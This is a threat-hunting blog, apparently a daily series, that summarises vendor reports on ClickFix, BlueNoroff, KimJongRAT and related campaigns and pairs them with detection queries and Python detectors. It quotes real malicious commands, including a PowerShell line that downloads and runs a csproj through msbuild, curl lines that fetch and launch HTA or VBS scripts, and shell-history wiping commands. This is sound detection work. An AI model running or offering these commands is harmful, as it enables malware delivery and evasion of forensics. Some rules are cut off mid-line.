Posts

172. Another Curious ClickFix PowerShell Command

Hello everyone! I think everybody already knows about the ClickFix technique, but we still see new variations, especially when it comes to the command the victim is asked to paste. Proofpoint has published a report on Amatera Stealer, and the adversary leveraged the ClickFix technique to deliver it. The victim is asked to paste the following command into the Windows Run dialog:

powershell -w h -c "$p=$env: TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -0 $p;&($env: SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p"

The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and execute it using msbuild.exe. So, as always, we can use suspicious command line arguments for detection, for example:

event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: (*msbuild* AND *csproj*)

See you tomorrow!
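The rule above turned into a small triage function, as an added example that is not from the post or the Proofpoint report: it applies the page's three conditions and, when they fire, pulls out the download URL and whether the window was hidden from the person who pasted the command. The event field names are the page's; the flat event dict and the sample events with a placeholder host are assumptions.

```python
import re
from typing import Optional

# The page's hunting rule, expressed as code:
#   event_type: "processcreatewin" AND proc_file_name: "powershell.exe"
#   AND cmdline: (*msbuild* AND *csproj*)
# Field names are the page's; the flat event dict is an assumed telemetry shape.

# `irm <url>` / `iwr <url>` as in the pasted command; used only to pull the URL out for triage.
URL_RE = re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\s+(?P<url>https?://\S+)", re.I)
# -w h / -WindowStyle Hidden: the console window is hidden from the victim.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)

def normalise(cmdline: str) -> str:
    """Collapse whitespace (including the '$env: TEMP' spacing seen above) before matching."""
    return re.sub(r"\s+", " ", cmdline.replace("$env: ", "$env:")).strip()

def triage_powershell_event(event: dict) -> Optional[dict]:
    """None when the rule does not fire; otherwise the triage facts an analyst wants first."""
    if event.get("event_type") != "processcreatewin":
        return None
    if event.get("proc_file_name", "").lower() != "powershell.exe":
        return None
    cmd = normalise(event.get("cmdline", ""))
    low = cmd.lower()
    if "msbuild" not in low or "csproj" not in low:
        return None
    url = URL_RE.search(cmd)
    return {
        "rule": "clickfix_powershell_msbuild_csproj",
        "hidden_window": bool(HIDDEN_RE.search(cmd)),
        "download_url": url.group("url") if url else None,
        "invokes_msbuild_exe": "msbuild.exe" in low,
    }

# Constructed sample events (not from the report): the first mirrors the pasted ClickFix
# command with a placeholder host; the other two must stay silent.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell -w h -c \"$p=$env: TEMP+'\\t.csproj';"
                "irm https://example.invalid/t.csproj -o $p;"
                "&($env: SystemRoot+'\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe') $p\""},
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell -File build.ps1 -Configuration Release"},
    {"event_type": "processcreatewin", "proc_file_name": "cmd.exe",
     "cmdline": "cmd /c msbuild app.csproj"},
]

def run(events=SAMPLE_EVENTS) -> list:
    """Triage results for the events that fire the rule."""
    return [r for r in (triage_powershell_event(e) for e in events) if r]

if __name__ == "__main__":
    for hit in run():
        print(hit)
```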

171. Detecting BlueNoroff's Indicator Removal Techniques

Hello everyone! Huntress has shared the results of its analysis of a recent BlueNoroff attack involving a macOS device, a fake Zoom extension and even deepfakes! So, let's look at some detection opportunities, starting with indicator removal techniques. The adversary abused the HISTFILE environment variable:

unset HISTFILE

We can definitely use it for detection:

event_type: "processcreatemac" AND cmdline: "unset histfile"

The next behavior is clearing the shell history:

history -p > /dev/null

This can also be used for detection:

event_type: "processcreatemac" AND proc_file_name: "history" AND cmdline: "dev//null"

Finally, the threat actors remove the shell history files:

rm -rf ~/.zsh_history
rm -rf ~/.bash_history
rm -rf ~/.zsh_sessions

And yes, this is another detection opportunity:

event_type: "processcreatemac" AND proc_file_name: "rm" AND cmdline: (" zsh_history " OR " bash_history " OR " zsh_ses...
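The three indicator-removal behaviors above as one detector, an added example that is not from the post or the Huntress analysis. Because unset and history are shell builtins, the first two rules here match on the whole command line of whichever shell ran them rather than on a process name; the event shape and the sample telemetry (user "victim") are constructed assumptions.

```python
import re
from typing import List

# Rule names follow the three indicator-removal behaviours described in the post;
# field names (event_type, proc_file_name, cmdline) are the page's, the event dict shape is assumed.
HISTORY_FILES = ("zsh_history", "bash_history", "zsh_sessions")

def match_rules(event: dict) -> List[str]:
    """Return the names of the indicator-removal rules this event matches (empty = no alert)."""
    if event.get("event_type") != "processcreatemac":
        return []
    name = event.get("proc_file_name", "").lower()
    cmd = re.sub(r"\s+", " ", event.get("cmdline", "")).lower()
    hits = []
    # 1) unset HISTFILE is a shell builtin, so inspect the command line of any process
    if re.search(r"\bunset\s+histfile\b", cmd):
        hits.append("histfile_unset")
    # 2) history -p > /dev/null is also a builtin: look for the flag plus the /dev/null redirect
    if re.search(r"\bhistory\s+-p\b", cmd) and "/dev/null" in cmd:
        hits.append("history_cleared")
    # 3) rm of the shell history files: this one does key on proc_file_name "rm", as on the page
    if name == "rm" and any(f in cmd for f in HISTORY_FILES):
        hits.append("history_files_removed")
    return hits

# Constructed sample telemetry (not from the report). Builtins arrive as the shell's own
# command line, e.g. `zsh -c "unset HISTFILE"`, rather than as a separate process.
SAMPLE_EVENTS = [
    {"event_type": "processcreatemac", "proc_file_name": "zsh",
     "cmdline": 'zsh -c "unset HISTFILE; history -p > /dev/null"'},
    {"event_type": "processcreatemac", "proc_file_name": "rm",
     "cmdline": "rm -rf /Users/victim/.zsh_history /Users/victim/.bash_history /Users/victim/.zsh_sessions"},
    {"event_type": "processcreatemac", "proc_file_name": "rm",
     "cmdline": "rm -rf /tmp/build-cache"},        # ordinary cleanup: must not fire
    {"event_type": "processcreatewin", "proc_file_name": "cmd.exe",
     "cmdline": "cmd /c del %USERPROFILE%\\.bash_history"},   # wrong platform: ignored
]

def detect(events=SAMPLE_EVENTS):
    """Pair each event's command line with the rules it triggers."""
    return [(e["cmdline"], match_rules(e)) for e in events]

if __name__ == "__main__":
    for cmdline, hits in detect():
        print(hits, cmdline)
```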

170. Hunting for Mocha Manakin

Hello everyone! Red Canary has colored another bird. This time the cluster is called Mocha Manakin. The adversary leverages the ClickFix technique to deliver a NodeJS-based backdoor named NodeInitRAT. Researchers note that this activity overlaps with Interlock ransomware, so it's important to detect it as early as possible. They have already shared a few detection opportunities you can use, but I also suggest hunting for suspicious events related to PowerShell spawning node.exe:

event_type: "processcreatewin" AND proc_p_file_path: "powershell.exe" AND proc_file_path: "node.exe"

See you tomorrow!

169. Regular Stealer - Lots of Detection and Hunting Opportunities

Hello everyone! We can get threat hunting and detection ideas not only from advanced threats, but also from commodity malware. Let's look at the KimJongRAT infection chain described by Unit42. Here we're dealing with malicious LNK files one more time. The file executes the following command:

"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\<USER>\AppData\Local\Temp && curl -O https://cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw.hta?v=2 && mshta C:\Users\<USER>\AppData\Local\Temp\sfmw.hta

Once again we see cURL abused to download a malicious file, this time an HTA, and mshta.exe used to execute it. So, the first hunting idea is to look for cURL downloading HTA files:

event_type: "processcreatewin" AND proc_file_name: "curl.exe" AND cmdline: "hta"

The next thing is mshta.exe and suspicious folders:

event_type: "processcreatewin" AND proc_file_name: "mshta.exe" AND cmdline: "local\...

168. Adversaries Abuse LLM to Generate Malicious Scripts

Hello everyone! I'm sure you already use LLMs to solve various security-related tasks. So do adversaries! For example, let's look at a campaign uncovered by Qianxin Threat Intelligence Center. The threat actors used Telegram to distribute archives containing malicious LNK files. These files abused cURL to download a malicious .vbs file from a remote server, for example:

C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images[.]oss-cn-shenzhen[.]aliyuncs[.]com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs"

Here we have a nice hunting opportunity:

event_type: "processcreatewin" AND proc_file_name: "curl.exe" AND cmdline: "vbs"

And if we look inside the .vbs file, we can see that it's very similar to those created with LLMs! That's it! See you tomorrow!

167. Adversaries Use Weaponized GitHub Repositories to Deliver Malware

Hello everyone! Trend Micro has uncovered a new threat actor dubbed Water Curse. The adversary uses weaponized GitHub repositories to deliver multistage malware. Researchers have already identified at least 76 GitHub accounts related to this campaign. The project files contain a snippet of malicious batch code inside the <PreBuildEvent> tag, which is triggered while the code is being compiled. MSBuild.exe spawns cmd.exe, which drops a malicious .vbs file, for example, C:\Users\[redacted]\AppData\Local\Temp\ohQ13W\XHa0aaUw9.vbs. And yes, we can use this behavior for hunting:

event_type: "filecreatewin" AND proc_p_file_path: "msbuild.exe" AND proc_file_path: "cmd.exe" AND file_path: "vbs"

See you tomorrow!

166. Detecting Windows Problem Reporting Abuse

Hello everyone! You can get detection and hunting ideas not only from threat actors' behaviors, but also from security researchers! For example, Adam shared an interesting case of Windows Problem Reporting abuse. This executable has many command line arguments, and the -boot one loads the following DLL: C:\Windows\System32\offdmpsvc.dll. It doesn't exist by default, so an adversary can write a payload there. This means we can use this argument for detection:

event_type: "processcreatewin" AND proc_file_name: "wermgr.exe" AND cmdline: "boot"

See you tomorrow!
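The Windows hunting queries from posts 170, 169 (the cURL rule), 168, 167 and 166, evaluated by one small rule matcher, added here and not taken from any of the cited reports. Each query becomes a set of field/substring conditions (a list means OR) matched case-insensitively over constructed events, which also shows the parent-process and file-creation fields in use; field names are the page's, everything else is assumed.

```python
from typing import Dict, List

# Field names (event_type, proc_file_name, proc_file_path, proc_p_file_path, file_path,
# cmdline) are the page's; the flat event dict and the matching semantics are assumptions.
# A rule maps field -> pattern; a pattern matches as a case-insensitive substring
# (the page's cmdline: "hta"), and a list of patterns means OR.
RULES = {
    # 170: PowerShell spawning node.exe
    "powershell_spawns_node": {"event_type": "processcreatewin",
                               "proc_p_file_path": "powershell.exe", "proc_file_path": "node.exe"},
    # 169 and 168: cURL downloading an HTA or VBS file
    "curl_downloads_script": {"event_type": "processcreatewin",
                              "proc_file_name": "curl.exe", "cmdline": ["hta", "vbs"]},
    # 167: MSBuild -> cmd.exe dropping a .vbs (file creation event, parent is msbuild.exe)
    "msbuild_cmd_drops_vbs": {"event_type": "filecreatewin", "proc_p_file_path": "msbuild.exe",
                              "proc_file_path": "cmd.exe", "file_path": "vbs"},
    # 166: wermgr.exe started with the -boot argument
    "wermgr_boot": {"event_type": "processcreatewin",
                    "proc_file_name": "wermgr.exe", "cmdline": "boot"},
}

def field_matches(value: str, pattern) -> bool:
    """Case-insensitive substring match; a list of patterns is an OR."""
    pats = pattern if isinstance(pattern, list) else [pattern]
    return any(p.lower() in value.lower() for p in pats)

def evaluate(event: Dict[str, str]) -> List[str]:
    """Names of every rule whose conditions all hold for this event."""
    return [name for name, rule in RULES.items()
            if all(field_matches(event.get(field, ""), pat) for field, pat in rule.items())]

# Constructed sample telemetry (not from the reports); hosts and user names are placeholders.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "node.exe", "cmdline": "node app.js",
     "proc_p_file_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "proc_file_path": "C:\\Users\\user1\\AppData\\Local\\node\\node.exe"},
    {"event_type": "processcreatewin", "proc_file_name": "curl.exe",
     "cmdline": "curl -O https://example.invalid/sfmw.hta?v=2"},
    {"event_type": "filecreatewin", "proc_file_path": "C:\\Windows\\System32\\cmd.exe",
     "proc_p_file_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe",
     "file_path": "C:\\Users\\user1\\AppData\\Local\\Temp\\abc123\\a.vbs"},
    {"event_type": "processcreatewin", "proc_file_name": "wermgr.exe",
     "cmdline": "wermgr.exe -upload"},   # a different, legitimate argument: must not fire
]

def detect_all(events=SAMPLE_EVENTS) -> List[List[str]]:
    """Rule hits per event, in input order."""
    return [evaluate(e) for e in events]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, detect_all()):
        print(hits, event.get("cmdline") or event.get("file_path"))
```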